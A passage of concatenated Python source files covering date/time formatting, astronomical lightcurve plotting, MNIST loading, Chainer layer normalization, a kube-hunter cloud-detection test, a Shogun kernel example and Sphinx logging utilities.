"M": minute,
"S": second,
}
return rules
# =============================================================================
class S3DateTimeFormatter:
""" Date/Time Formatter for non-Gregorian calendars """
def __init__(self, calendar):
"""
Args:
calendar: the calendar
"""
# Get the effective calendar
if not calendar:
raise TypeError("Invalid calendar: %s (%s)" % (calendar, type(calendar)))
self.calendar = calendar.calendar
# -------------------------------------------------------------------------
def render(self, timetuple, dtfmt):
"""
Render a timetuple as string according to the given format
Args:
timetuple: the timetuple (y, m, d, hh, mm, ss)
dtfmt: the date/time format (string)
TODO support day-of-week options
"""
y, m, d, hh, mm, ss = timetuple
T = current.T
calendar = self.calendar
rules = {"d": "%02d" % d,
"b": T(calendar.MONTH_ABBR[m - 1]),
"B": T(calendar.MONTH_NAME[m - 1]),
"m": "%02d" % m,
"y": "%02d" % (y % 100),
"Y": "%04d" % y,
"H": "%02d" % hh,
"I": "%02d" % ((hh % 12) or 12),
"p": T("AM") if hh < 12 else T("PM"),
"M": "%02d" % mm,
"S": "%02d" % ss,
}
# Interpret the format
result = []
sequence = []
def close(s):
s = "".join(s)
if s:
result.append(s)
from .convert import s3_str
rule = False
for c in s3_str(dtfmt):
if rule and c in rules:
# Close previous sequence
sequence.pop()
close(sequence)
# Append control rule
result.append(s3_str(rules[c]))
# Start new sequence
sequence = []
# Close rule
rule = False
continue
if c == "%" and not rule:
rule = True
else:
rule = False
sequence.append(c)
if sequence:
close(sequence)
return "".join(result)
# =============================================================================
# Date/Time Parser and Formatter (@todo: integrate with S3Calendar)
#
def s3_parse_datetime(string, dtfmt=None):
"""
Parse a date/time string according to the given format.
Args:
string: the string
dtfmt: the string format (defaults to ISOFORMAT)
Returns:
a datetime object, or None if the string is invalid
"""
if not string:
return None
if dtfmt is None:
dtfmt = ISOFORMAT
try:
(y, m, d, hh, mm, ss) = time.strptime(string, dtfmt)[:6]
dt = datetime.datetime(y, m, d, hh, mm, ss)
except ValueError:
dt = None
return dt
#--------------------------------------------------------------------------
def s3_format_datetime(dt=None, dtfmt=None):
"""
Format a datetime object according to the given format.
Args:
dt: the datetime object, defaults to datetime.datetime.utcnow()
dtfmt: the string format (defaults to ISOFORMAT)
Returns:
a string
"""
if not dt:
dt = datetime.datetime.utcnow()
if dtfmt is None:
dtfmt = ISOFORMAT
return dt.strftime(dtfmt)
# =============================================================================
# ISO-8601 Format Date/Time
#
def s3_decode_iso_datetime(dtstr):
"""
Convert date/time string in ISO-8601 format into a datetime object
Args:
dtstr: the date/time string
Returns:
a timezone-aware datetime.datetime object
Raises:
ValueError: if the string cannot be parsed
Note:
This has "iso" in its name for consistency reasons, but can actually
read a variety of formats
"""
# Default seconds/microseconds=zero
DEFAULT = datetime.datetime.utcnow().replace(hour = 8,
minute = 0,
second = 0,
microsecond = 0,
)
try:
dt = dateutil.parser.parse(dtstr, default=DEFAULT)
except (AttributeError, TypeError, ValueError):
raise ValueError("Invalid date/time string: %s (%s)" % (dtstr, type(dtstr)))
if dt.tzinfo is None:
dt = dt.replace(tzinfo=dateutil.tz.tzutc())
return dt
#--------------------------------------------------------------------------
def s3_encode_iso_datetime(dt):
"""
Convert a datetime object into a ISO-8601 formatted
string, omitting microseconds
Args:
dt: the datetime object
"""
if isinstance(dt, (datetime.datetime, datetime.time)):
dx = dt.replace(microsecond=0)
else:
dx = dt
return dx.isoformat()
# =============================================================================
# Time Zone Handling
#
def s3_utc(dt):
"""
Get a datetime object for the same date/time as the
datetime object, but in UTC
Args:
dt: the datetime object
"""
if dt:
if dt.tzinfo is None:
return dt.replace(tzinfo=dateutil.tz.tzutc())
return dt.astimezone(dateutil.tz.tzutc())
else:
return None
#--------------------------------------------------------------------------
class S3DefaultTZ(datetime.tzinfo):
"""
A datetime.tzinfo class that can be instantiated from
a UTC offset string or integer hours, used for testing and
as fallback for s3_get_tzinfo if the client's timezone cannot
be determined but an offset is available
"""
def __init__(self, offset=None):
super(S3DefaultTZ, self).__init__()
if offset:
offset_sec = S3DateTime.get_offset_value(offset)
self._offset = datetime.timedelta(seconds=offset_sec)
else:
self._offset = datetime.timedelta(0)
def utcoffset(self, dt):
return self._offset
def dst(self, dt):
return datetime.timedelta(0)
#--------------------------------------------------------------------------
def s3_get_tzinfo():
"""
Get a datetime.tzinfo object for the client's timezone
"""
response = current.response
tzinfo = response.s3.tzinfo
if tzinfo is None:
session = current.session
# 1st choice: use the _timezone parameter from the current form
try:
tzname = current.request.post_vars.get("_timezone")
except (ValueError, TypeError):
tzname = None
if tzname:
session.s3.tzname = tzname
else:
# Fall back to the previous _timezone of the same session
tzname = session.s3.tzname
if tzname:
tzinfo = dateutil.tz.gettz(tzname)
# 2nd choice: use the _utc_offset parameter from the current form
# (e.g. client not supporting Intl)
if not tzinfo:
offset = S3DateTime.get_utc_offset()
if offset:
tzinfo = S3DefaultTZ(offset=offset)
# 3rd choice: use the timezone specified in deployment settings
if not tzinfo:
tzname = current.deployment_settings.get_L10n_timezone()
if tzname:
tzinfo = dateutil.tz.gettz(tzname)
if tzinfo:
response.s3.tzinfo = tzinfo
# No further fallback, treat as UTC
return tzinfo
# =============================================================================
# Utilities
#
def s3_relative_datetime(dtexpr):
"""
Return an absolute datetime for a relative date/time expression
Args:
dtexpr: the relative date/time expression, syntax:
"[+|-][numeric][Y|M|D|h|m|s]", e.g.
"+12M" = twelve months from now,
additionally recognizes the string "NOW"
Returns:
datetime.datetime (UTC), or None if dtexpr is invalid
"""
if dtexpr:
dtexpr = dtexpr.strip()
now = current.request.utcnow
if dtexpr.lower() == "now":
return now
elif dtexpr[0] not in "+-":
return None
else:
return None
from dateutil.relativedelta import relativedelta
timedelta = datetime.timedelta
f = 1
valid = False
then = now
for m in RELATIVE.finditer(dtexpr):
(sign, value, unit) = m.group(1, 2, 3)
try:
value = int(value)
except ValueError:
continue
if sign == "-":
f = -1
elif sign == "+":
f = 1
if unit == "Y":
then += relativedelta(years = f * value)
elif unit == "M":
then += relativedelta(months = f * value)
else:
then += timedelta(seconds = f * value * SECONDS[unit])
valid = True
return then if valid else None
# END =========================================================================
|
the-stack_106_19004
|
#!/usr/bin/env python3
# Author: Simeon Reusch ([email protected])
# License: BSD-3-Clause
import os, time, sys, logging
import numpy as np
import pandas as pd
from astropy.time import Time
from astropy.table import Table
from astropy.io import fits
import matplotlib.pyplot as plt
from datetime import datetime, date
from ztffps import pipeline, database
from ztffps.utils import calculate_magnitudes, abmag_err_to_flux_err, abmag_to_flux
def plot_lightcurve(
name,
snt=5.0,
daysago=None,
daysuntil=None,
mag_range=None,
flux_range=None,
logger=None,
plot_flux=False,
):
""" """
if logger is None:
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger()
### define directories
lc_path = os.path.join(pipeline.FORCEPHOTODATA, f"{name}.csv")
lc_plotdir = pipeline.PLOTDATA
lc_plotted_dir = pipeline.PLOT_DATAFRAMES
lc = pd.read_csv(lc_path)
query = database.read_database(name)
has_alertdata = False
if query["jdobs_alert"][0] is not None:
has_alertdata = True
alert_jd = query["jdobs_alert"][0]
alert_mag = query["mag_alert"][0]
alert_magerr = query["magerr_alert"][0]
alert_fid = query["fid_alert"][0]
alert_zp = query["magzp_alert"][0]
alert_zp_err = query["magzp_err_alert"][0]
alert_mjd = np.asarray(alert_jd) - 2400000.5
# Cut values where magzp is NaN as no flux can be extracted
alert_fid = np.asarray(alert_fid, dtype=int)
alert_mjd = np.asarray(alert_mjd, dtype=float)
alert_mag = np.asarray(alert_mag, dtype=float)
alert_mag_err = np.asarray(alert_magerr, dtype=float)
alert_zp = np.asarray(alert_zp, dtype=float)
alert_zp_err = np.asarray(alert_zp_err, dtype=float)
alert_zp = np.ma.masked_invalid(alert_zp)
mask = np.ma.getmask(alert_zp)
alert_zp = np.ma.compressed(alert_zp)
alert_zp_err = np.ma.compressed(np.ma.masked_where(mask, alert_zp_err))
alert_mjd = np.ma.compressed(np.ma.masked_where(mask, alert_mjd))
alert_mag = np.ma.compressed(np.ma.masked_where(mask, alert_mag))
alert_magerr = np.ma.compressed(np.ma.masked_where(mask, alert_magerr))
alert_fid = np.ma.compressed(np.ma.masked_where(mask, alert_fid))
# and now we calculate the flux
alert_flux = abmag_to_flux(alert_mag, alert_zp)
alert_flux_err = abmag_err_to_flux_err(
alert_mag, alert_magerr, alert_zp, alert_zp_err
)
### apply time-range cut:
now = Time(time.time(), format="unix", scale="utc").mjd
# bla = Time("2020-01-09", format="iso", scale="utc").mjd
mjdmin = now - daysago if daysago is not None else 58208.5
mjdmax = now - daysuntil if daysuntil is not None else now
if daysuntil is None and daysago is None:
axis_min = mjdmin
axis_max = now + 10
else:
axis_min = mjdmin
axis_max = mjdmax + 1
### remove rows outside the timerange and with bad chisq-values, reset index
lc.query("obsmjd >= @mjdmin and obsmjd <= @mjdmax", inplace=True)
lc.query("chi2 > 0", inplace=True)
lc = lc.reset_index()
del lc["index"]
lc = calculate_magnitudes(lc, snt)
lc.sort_values(by=["obsmjd"], inplace=True)
lc.reset_index(inplace=True)
lc.drop(columns=["index"], inplace=True)
# Save this version of the dataframe for later analysis (and to be sent by mail)
lc.to_csv(os.path.join(lc_plotted_dir, f"{name}_SNT_{snt}.csv"))
# Create Dataframe for Alert data / Rounding is neccessary because Alert and Forced Photometry MJDs are not consistent
if has_alertdata:
alert_df = pd.DataFrame(
data={
"obsmjd": np.around(alert_mjd, decimals=4),
"filter_id": alert_fid,
"flux": alert_flux,
"flux_err": alert_flux_err,
"mag": alert_mag,
"mag_err": alert_magerr,
"magzp": alert_zp,
"magzp_err": alert_zp_err,
}
)
alert_df = alert_df[
~alert_df["obsmjd"].isin(np.around(lc.obsmjd.values, decimals=4))
]
alert_df = alert_df.reset_index()
alert_df.drop(columns=["index"], inplace=True)
alert_df.to_csv(os.path.join(lc_plotted_dir, f"{name}_alert.csv"))
alert_g = alert_df.query("filter_id == 1")
alert_r = alert_df.query("filter_id == 2")
alert_i = alert_df.query("filter_id == 3")
# Create filterspecific dataframes
len_before_sn_cut = len(lc)
t0_dist = np.asarray(lc.obsmjd.values - now)
lc.insert(2, "t0_dist", t0_dist)
uplim = lc.query("mag == 99")
lc_full = lc.copy()
lc = lc.query("mag < 99")
len_after_sn_cut = len(lc)
filterlist = [["ZTF g", "ZTF_g"], ["ZTF r", "ZTF_r"], ["ZTF i", "ZTF_i"]]
if not plot_flux:
g = lc[lc["filter"].isin(filterlist[0])]
r = lc[lc["filter"].isin(filterlist[1])]
i = lc[lc["filter"].isin(filterlist[2])]
g_uplim = uplim[uplim["filter"].isin(filterlist[0])]
r_uplim = uplim[uplim["filter"].isin(filterlist[1])]
i_uplim = uplim[uplim["filter"].isin(filterlist[2])]
else:
g = lc_full[lc_full["filter"].isin(filterlist[0])]
r = lc_full[lc_full["filter"].isin(filterlist[1])]
i = lc_full[lc_full["filter"].isin(filterlist[2])]
logger.info(
f"{name} {len_after_sn_cut} of {len_before_sn_cut} datapoints survived SNT cut of {snt}"
)
### define functions for secondary axis (conversion from jd --> distance to today)
def t0_dist(obsmjd):
""" """
t0 = Time(time.time(), format="unix", scale="utc").mjd
return obsmjd - t0
def t0_to_mjd(dist_to_t0):
""" """
t0 = Time(time.time(), format="unix", scale="utc").mjd
return t0 + dist_to_t0
### actual plotting
fig, ax = plt.subplots(1, 1, figsize=[10, 4.2])
fig.subplots_adjust(top=0.8)
ax2 = ax.secondary_xaxis("top", functions=(t0_dist, t0_to_mjd))
# Get time now as UTC time
ts = time.time()
utc_now = datetime.utcfromtimestamp(ts)
utc_string = utc_now.strftime("%Y-%m-%d %H:%M")
ax2.set_xlabel(f"Days from {utc_string} UT")
fig.suptitle(f"{name}", fontweight="bold")
ax.grid(b=True, axis="y")
ax.set_xlabel("MJD")
if not plot_flux:
ax.set_ylabel("Magnitude [AB]")
else:
ax.set_ylabel("Flux")
ax.set_xlim([axis_min, axis_max])
ax2.set_xlim([ax.get_xlim()[0] - now, ax.get_xlim()[1] - now])
bands = ["g", "r", "i"]
plot_colors = {"g": "green", "r": "red", "i": "orange"}
plot_labels = {"g": "FP g", "r": "FP r", "i": "FP i"}
plot_labels_alert = {"g": "Alert g", "r": "Alert r", "i": "Alert i"}
colors = ["green", "red", "orange"]
if not plot_flux:
upper_limit_dfs = {"g": g_uplim, "r": r_uplim, "i": i_uplim}
mag_dfs = {"g": g, "r": r, "i": i}
for band in upper_limit_dfs.keys():
ax.scatter(
upper_limit_dfs[band].obsmjd.values,
upper_limit_dfs[band].upper_limit.values,
color=plot_colors[band],
marker="v",
s=1.3,
alpha=0.5,
)
for band in mag_dfs.keys():
ax.errorbar(
mag_dfs[band].obsmjd.values,
mag_dfs[band].mag.values,
mag_dfs[band].mag_err.values,
color=plot_colors[band],
fmt=".",
label=plot_labels[band],
mec="black",
mew=0.5,
)
if has_alertdata:
alert_dfs = {"g": alert_g, "r": alert_r, "i": alert_i}
for band in alert_dfs.keys():
ax.errorbar(
alert_dfs[band].obsmjd.values,
alert_dfs[band].mag.values,
alert_dfs[band].mag_err.values,
color=plot_colors[band],
fmt=".",
label=plot_labels_alert[band],
mew=0,
)
else:
flux_dfs = {"g": g, "r": r, "i": i}
for band in flux_dfs.keys():
ax.errorbar(
flux_dfs[band].obsmjd.values,
flux_dfs[band].ampl.values,
flux_dfs[band]["ampl.err"].values,
color=plot_colors[band],
fmt=".",
label=plot_labels[band],
mec="black",
mew=0.5,
)
if has_alertdata:
alert_dfs = {"g": alert_g, "r": alert_r, "i": alert_i}
for band in alert_dfs.keys():
ax.errorbar(
alert_dfs[band].obsmjd.values,
alert_dfs[band].flux.values,
alert_dfs[band].flux_err.values,
color=plot_colors[band],
fmt=".",
label=plot_labels_alert[band],
mew=0,
)
ax.axvline(x=now, color="grey", linewidth=0.5, linestyle="--")
if not plot_flux:
if mag_range is None:
ax.set_ylim([23, 15])
else:
ax.set_ylim([np.max(mag_range), np.min(mag_range)])
else:
if flux_range is not None:
ax.set_ylim([np.min(flux_range), np.max(flux_range)])
if not plot_flux:
ax.legend(
loc=0,
framealpha=1,
title=f"SNT={snt:.0f}",
fontsize="x-small",
title_fontsize="x-small",
)
else:
ax.legend(
loc=0, framealpha=1, fontsize="x-small", title_fontsize="x-small",
)
images_dir = os.path.join(lc_plotdir, "images")
if not os.path.exists(images_dir):
os.makedirs(images_dir)
if not plot_flux:
image_path = os.path.join(images_dir, f"{name}_SNT_{snt}.png")
else:
image_path = os.path.join(images_dir, f"{name}_flux.png")
fig.savefig(image_path, dpi=300, bbox_inches="tight")
|
the-stack_106_19006
|
"""
mnist_loader
~~~~~~~~~~~~
A library to load the MNIST image data. For details of the data
structures that are returned, see the doc strings for ``load_data``
and ``load_data_wrapper``. In practice, ``load_data_wrapper`` is the
function usually called by our neural network code.
"""
#### Libraries
# Standard library
import _pickle as cPickle
import gzip
# Third-party libraries
import numpy as np
def load_data():
"""Return the MNIST data as a tuple containing the training data,
the validation data, and the test data.
The ``training_data`` is returned as a tuple with two entries.
The first entry contains the actual training images. This is a
numpy ndarray with 50,000 entries. Each entry is, in turn, a
numpy ndarray with 784 values, representing the 28 * 28 = 784
pixels in a single MNIST image.
The second entry in the ``training_data`` tuple is a numpy ndarray
containing 50,000 entries. Those entries are just the digit
values (0...9) for the corresponding images contained in the first
entry of the tuple.
The ``validation_data`` and ``test_data`` are similar, except
each contains only 10,000 images.
This is a nice data format, but for use in neural networks it's
helpful to modify the format of the ``training_data`` a little.
That's done in the wrapper function ``load_data_wrapper()``, see
below.
"""
f = gzip.open('../data/mnist.pkl.gz', 'rb')
training_data, validation_data, test_data = cPickle.load(f, encoding='latin1')
f.close()
return (training_data, validation_data, test_data)
def load_data_wrapper():
"""Return a tuple containing ``(training_data, validation_data,
test_data)``. Based on ``load_data``, but the format is more
convenient for use in our implementation of neural networks.
In particular, ``training_data`` is a list containing 50,000
2-tuples ``(x, y)``. ``x`` is a 784-dimensional numpy.ndarray
containing the input image. ``y`` is a 10-dimensional
numpy.ndarray representing the unit vector corresponding to the
correct digit for ``x``.
``validation_data`` and ``test_data`` are lists containing 10,000
2-tuples ``(x, y)``. In each case, ``x`` is a 784-dimensional
numpy.ndarry containing the input image, and ``y`` is the
corresponding classification, i.e., the digit values (integers)
corresponding to ``x``.
Obviously, this means we're using slightly different formats for
the training data and the validation / test data. These formats
turn out to be the most convenient for use in our neural network
code."""
tr_d, va_d, te_d = load_data()
training_inputs = [np.reshape(x, (784, 1)) for x in tr_d[0]]
training_results = [vectorized_result(y) for y in tr_d[1]]
training_data = list(zip(training_inputs, training_results))
validation_inputs = [np.reshape(x, (784, 1)) for x in va_d[0]]
validation_data = list(zip(validation_inputs, va_d[1]))
test_inputs = [np.reshape(x, (784, 1)) for x in te_d[0]]
test_data = list(zip(test_inputs, te_d[1]))
return (training_data, validation_data, test_data)
def vectorized_result(j):
"""Return a 10-dimensional unit vector with a 1.0 in the jth
position and zeroes elsewhere. This is used to convert a digit
(0...9) into a corresponding desired output from the neural
network."""
e = np.zeros((10, 1))
e[j] = 1.0
return e
|
the-stack_106_19007
|
from chainer.functions.normalization import layer_normalization
from chainer import link
from chainer import utils
from chainer import variable
class LayerNormalization(link.Link):
"""Layer normalization layer on outputs of linear functions.
.. warning::
This feature is experimental. The interface can change in the future.
This link implements a "layer normalization" layer
which normalizes the input units by statistics
that are computed along the second axis,
scales and shifts them.
Parameter initialization will be deferred until
the first forward data pass at which time the size will be determined.
Args:
size (int): Size of input units. If ``None``, parameter initialization
will be deferred until the first forward data pass at which time
the size will be determined.
eps (float): Epsilon value for numerical stability of normalization.
initial_gamma (~chainer.Initializer): Initializer for scaling vector.
If ``None``, then the vector is filled by 1.
If a scalar, the vector is filled by it.
If ``numpy.ndarray``, the vector is set by it.
initial_beta (~chainer.Initializer): Initializer for shifting vector.
If ``None``, then the vector is filled by 0.
If a scalar, the vector is filled by it.
If ``numpy.ndarray``, the vector is set by it.
Attributes:
gamma (~chainer.Parameter): Scaling parameter.
beta (~chainer.Parameter): Shifting parameter.
eps (float): Epsilon value for numerical stability.
See: `Layer Normalization <https://arxiv.org/abs/1607.06450>`_
"""
def __init__(self, size=None, eps=1e-6, initial_gamma=None,
initial_beta=None):
super(LayerNormalization, self).__init__()
if initial_gamma is None:
initial_gamma = 1
if initial_beta is None:
initial_beta = 0
with self.init_scope():
self.gamma = variable.Parameter(initial_gamma)
self.beta = variable.Parameter(initial_beta)
self.eps = eps
if size is not None:
self._initialize_params(size)
def _initialize_params(self, size):
self.gamma.initialize(size)
self.beta.initialize(size)
def forward(self, x):
"""Apply layer normalization to given input.
Args:
x (~chainer.Variable): Batch vectors.
Shape of this value must be `(batch_size, unit_size)`,
e.g., the output of :func:`~chainer.functions.linear`.
Returns:
~chainer.Variable: Output of the layer normalization.
"""
if self.gamma.data is None:
in_size = utils.size_of_shape(x.shape[1:])
self._initialize_params(in_size)
return layer_normalization.layer_normalization(
x, self.gamma, self.beta, self.eps)
|
the-stack_106_19008
|
import requests_mock
import json
from kube_hunter.conf import Config, set_config
from kube_hunter.core.events.types import NewHostEvent
set_config(Config())
def test_presetcloud():
"""Testing if it doesn't try to run get_cloud if the cloud type is already set.
get_cloud(1.2.3.4) will result with an error
"""
expcted = "AWS"
hostEvent = NewHostEvent(host="1.2.3.4", cloud=expcted)
assert expcted == hostEvent.cloud
def test_getcloud():
fake_host = "1.2.3.4"
expected_cloud = "Azure"
result = {"cloud": expected_cloud}
with requests_mock.mock() as m:
m.get(f"https://api.azurespeed.com/api/region?ipOrUrl={fake_host}", text=json.dumps(result))
hostEvent = NewHostEvent(host=fake_host)
assert hostEvent.cloud == expected_cloud
|
the-stack_106_19009
|
#!/usr/bin/env python
traindat = '../data/fm_train_real.dat'
testdat = '../data/fm_test_real.dat'
parameter_list = [[traindat,testdat,4,0.0,True],[traindat,testdat,5,0.0,True]]
def kernel_poly (train_fname=traindat,test_fname=testdat,degree=4,c=0.0,
use_normalization=True):
from shogun import RealFeatures, PolyKernel, CSVFile
feats_train=RealFeatures(CSVFile(train_fname))
feats_test=RealFeatures(CSVFile(test_fname))
kernel=PolyKernel(
feats_train, feats_train, degree, c, use_normalization)
km_train=kernel.get_kernel_matrix()
kernel.init(feats_train, feats_test)
km_test=kernel.get_kernel_matrix()
return km_train,km_test,kernel
if __name__=='__main__':
print('Poly')
kernel_poly (*parameter_list[0])
|
the-stack_106_19012
|
# -*- coding: utf-8 -*-
"""
sphinx.util.logging
~~~~~~~~~~~~~~~~~~~
Logging utility functions for Sphinx.
:copyright: Copyright 2007-2017 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from __future__ import absolute_import
import logging
import logging.handlers
from contextlib import contextmanager
from collections import defaultdict
from six import PY2, StringIO
from docutils import nodes
from docutils.utils import get_source_line
from sphinx.errors import SphinxWarning
from sphinx.util.console import colorize
if False:
# For type annotation
from typing import Any, Dict, Generator, IO, List, Tuple, Union # NOQA
from docutils import nodes # NOQA
from sphinx.application import Sphinx # NOQA
VERBOSE = 15
LEVEL_NAMES = defaultdict(lambda: logging.WARNING) # type: Dict[str, int]
LEVEL_NAMES.update({
'CRITICAL': logging.CRITICAL,
'SEVERE': logging.CRITICAL,
'ERROR': logging.ERROR,
'WARNING': logging.WARNING,
'INFO': logging.INFO,
'VERBOSE': VERBOSE,
'DEBUG': logging.DEBUG,
})
VERBOSITY_MAP = defaultdict(lambda: 0) # type: Dict[int, int]
VERBOSITY_MAP.update({
0: logging.INFO,
1: VERBOSE,
2: logging.DEBUG,
})
COLOR_MAP = defaultdict(lambda: 'blue') # type: Dict[int, unicode]
COLOR_MAP.update({
logging.ERROR: 'darkred',
logging.WARNING: 'darkred',
logging.DEBUG: 'darkgray',
})
def getLogger(name):
# type: (str) -> SphinxLoggerAdapter
"""Get logger wrapped by SphinxLoggerAdapter."""
return SphinxLoggerAdapter(logging.getLogger(name), {})
def convert_serializable(records):
# type: (List[logging.LogRecord]) -> None
"""Convert LogRecord serializable."""
for r in records:
# extract arguments to a message and clear them
r.msg = r.getMessage()
r.args = ()
class SphinxWarningLogRecord(logging.LogRecord):
"""Log record class supporting location"""
location = None # type: Any
def getMessage(self):
# type: () -> str
message = super(SphinxWarningLogRecord, self).getMessage()
location = getattr(self, 'location', None)
if location:
message = '%s: WARNING: %s' % (location, message)
elif 'WARNING:' not in message:
message = 'WARNING: %s' % message
return message
class SphinxLoggerAdapter(logging.LoggerAdapter):
"""LoggerAdapter allowing ``type`` and ``subtype`` keywords."""
def log(self, level, msg, *args, **kwargs): # type: ignore
# type: (Union[int, str], unicode, Any, Any) -> None
if isinstance(level, int):
super(SphinxLoggerAdapter, self).log(level, msg, *args, **kwargs)
else:
levelno = LEVEL_NAMES[level]
super(SphinxLoggerAdapter, self).log(levelno, msg, *args, **kwargs)
def verbose(self, msg, *args, **kwargs):
# type: (unicode, Any, Any) -> None
self.log(VERBOSE, msg, *args, **kwargs)
def process(self, msg, kwargs): # type: ignore
# type: (unicode, Dict) -> Tuple[unicode, Dict]
extra = kwargs.setdefault('extra', {})
if 'type' in kwargs:
extra['type'] = kwargs.pop('type')
if 'subtype' in kwargs:
extra['subtype'] = kwargs.pop('subtype')
if 'location' in kwargs:
extra['location'] = kwargs.pop('location')
if 'nonl' in kwargs:
extra['nonl'] = kwargs.pop('nonl')
if 'color' in kwargs:
extra['color'] = kwargs.pop('color')
return msg, kwargs
def handle(self, record):
# type: (logging.LogRecord) -> None
self.logger.handle(record) # type: ignore
class WarningStreamHandler(logging.StreamHandler):
"""StreamHandler for warnings."""
pass
class NewLineStreamHandlerPY2(logging.StreamHandler):
"""StreamHandler which switches line terminator by record.nonl flag."""
def emit(self, record):
# type: (logging.LogRecord) -> None
try:
self.acquire()
stream = self.stream # type: ignore
if getattr(record, 'nonl', False):
# remove return code forcely when nonl=True
self.stream = StringIO()
super(NewLineStreamHandlerPY2, self).emit(record)
stream.write(self.stream.getvalue()[:-1])
stream.flush()
else:
super(NewLineStreamHandlerPY2, self).emit(record)
finally:
self.stream = stream
self.release()
class NewLineStreamHandlerPY3(logging.StreamHandler):
"""StreamHandler which switches line terminator by record.nonl flag."""
def emit(self, record):
# type: (logging.LogRecord) -> None
try:
self.acquire()
if getattr(record, 'nonl', False):
# skip appending terminator when nonl=True
self.terminator = ''
super(NewLineStreamHandlerPY3, self).emit(record)
finally:
self.terminator = '\n'
self.release()
if PY2:
NewLineStreamHandler = NewLineStreamHandlerPY2
else:
NewLineStreamHandler = NewLineStreamHandlerPY3
class MemoryHandler(logging.handlers.BufferingHandler):
"""Handler buffering all logs."""
def __init__(self):
# type: () -> None
super(MemoryHandler, self).__init__(-1)
def shouldFlush(self, record):
# type: (logging.LogRecord) -> bool
return False # never flush
def flushTo(self, logger):
# type: (logging.Logger) -> None
self.acquire()
try:
for record in self.buffer:
logger.handle(record)
self.buffer = [] # type: List[logging.LogRecord]
finally:
self.release()
def clear(self):
# type: () -> List[logging.LogRecord]
buffer, self.buffer = self.buffer, []
return buffer
@contextmanager
def pending_warnings():
# type: () -> Generator
"""contextmanager to pend logging warnings temporary."""
logger = logging.getLogger()
memhandler = MemoryHandler()
memhandler.setLevel(logging.WARNING)
try:
handlers = []
for handler in logger.handlers[:]:
if isinstance(handler, WarningStreamHandler):
logger.removeHandler(handler)
handlers.append(handler)
logger.addHandler(memhandler)
yield memhandler
finally:
logger.removeHandler(memhandler)
for handler in handlers:
logger.addHandler(handler)
memhandler.flushTo(logger)
@contextmanager
def pending_logging():
# type: () -> Generator
"""contextmanager to pend logging all logs temporary."""
logger = logging.getLogger()
memhandler = MemoryHandler()
try:
handlers = []
for handler in logger.handlers[:]:
logger.removeHandler(handler)
handlers.append(handler)
logger.addHandler(memhandler)
yield memhandler
finally:
logger.removeHandler(memhandler)
for handler in handlers:
logger.addHandler(handler)
memhandler.flushTo(logger)
@contextmanager
def skip_warningiserror(skip=True):
# type: (bool) -> Generator
"""contextmanager to skip WarningIsErrorFilter for a while."""
logger = logging.getLogger()
if skip is False:
yield
else:
try:
disabler = DisableWarningIsErrorFilter()
for handler in logger.handlers:
# use internal method; filters.insert() directly to install disabler
# before WarningIsErrorFilter
handler.filters.insert(0, disabler)
yield
finally:
for handler in logger.handlers:
handler.removeFilter(disabler)
class LogCollector(object):
def __init__(self):
# type: () -> None
self.logs = [] # type: List[logging.LogRecord]
@contextmanager
def collect(self):
# type: () -> Generator
with pending_logging() as memhandler:
yield
self.logs = memhandler.clear()
class InfoFilter(logging.Filter):
"""Filter error and warning messages."""
def filter(self, record):
# type: (logging.LogRecord) -> bool
if record.levelno < logging.WARNING:
return True
else:
return False
def is_suppressed_warning(type, subtype, suppress_warnings):
# type: (unicode, unicode, List[unicode]) -> bool
"""Check the warning is suppressed or not."""
if type is None:
return False
for warning_type in suppress_warnings:
if '.' in warning_type:
target, subtarget = warning_type.split('.', 1)
else:
target, subtarget = warning_type, None
if target == type:
if (subtype is None or subtarget is None or
subtarget == subtype or subtarget == '*'):
return True
return False
class WarningSuppressor(logging.Filter):
"""Filter logs by `suppress_warnings`."""
def __init__(self, app):
# type: (Sphinx) -> None
self.app = app
super(WarningSuppressor, self).__init__()
def filter(self, record):
# type: (logging.LogRecord) -> bool
type = getattr(record, 'type', None)
subtype = getattr(record, 'subtype', None)
try:
suppress_warnings = self.app.config.suppress_warnings
except AttributeError:
# config is not initialized yet (ex. in conf.py)
suppress_warnings = []
if is_suppressed_warning(type, subtype, suppress_warnings):
return False
else:
self.app._warncount += 1
return True
class WarningIsErrorFilter(logging.Filter):
"""Raise exception if warning emitted."""
def __init__(self, app):
# type: (Sphinx) -> None
self.app = app
super(WarningIsErrorFilter, self).__init__()
def filter(self, record):
# type: (logging.LogRecord) -> bool
if getattr(record, 'skip_warningsiserror', False):
# disabled by DisableWarningIsErrorFilter
return True
elif self.app.warningiserror:
location = getattr(record, 'location', '')
if location:
raise SphinxWarning(location + ":" + record.msg % record.args)
else:
raise SphinxWarning(record.msg % record.args)
else:
return True
class DisableWarningIsErrorFilter(logging.Filter):
"""Disable WarningIsErrorFilter if this filter installed."""
def filter(self, record):
# type: (logging.LogRecord) -> bool
record.skip_warningsiserror = True # type: ignore
return True
class WarningLogRecordTranslator(logging.Filter):
"""Converts a log record to one Sphinx expects
* Make a instance of SphinxWarningLogRecord
* docname to path if location given
"""
def __init__(self, app):
# type: (Sphinx) -> None
self.app = app
super(WarningLogRecordTranslator, self).__init__()
def filter(self, record): # type: ignore
# type: (SphinxWarningLogRecord) -> bool
if isinstance(record, logging.LogRecord):
record.__class__ = SphinxWarningLogRecord # force subclassing to handle location
location = getattr(record, 'location', None)
if isinstance(location, tuple):
docname, lineno = location
if docname and lineno:
record.location = '%s:%s' % (self.app.env.doc2path(docname), lineno)
elif docname:
record.location = '%s' % self.app.env.doc2path(docname)
else:
record.location = None
elif isinstance(location, nodes.Node):
(source, line) = get_source_line(location)
if source and line:
record.location = "%s:%s" % (source, line)
elif source:
record.location = "%s:" % source
elif line:
record.location = "<unknown>:%s" % line
else:
record.location = None
elif location and ':' not in location:
record.location = '%s' % self.app.env.doc2path(location)
return True
class ColorizeFormatter(logging.Formatter):
def format(self, record):
# type: (logging.LogRecord) -> str
message = super(ColorizeFormatter, self).format(record)
color = getattr(record, 'color', None)
if color is None:
color = COLOR_MAP.get(record.levelno)
if color:
return colorize(color, message) # type: ignore
else:
return message
class SafeEncodingWriter(object):
"""Stream writer which ignores UnicodeEncodeError silently"""
def __init__(self, stream):
# type: (IO) -> None
self.stream = stream
self.encoding = getattr(stream, 'encoding', 'ascii') or 'ascii'
def write(self, data):
# type: (unicode) -> None
try:
self.stream.write(data)
except UnicodeEncodeError:
# stream accept only str, not bytes. So, we encode and replace
# non-encodable characters, then decode them.
self.stream.write(data.encode(self.encoding, 'replace').decode(self.encoding))
def flush(self):
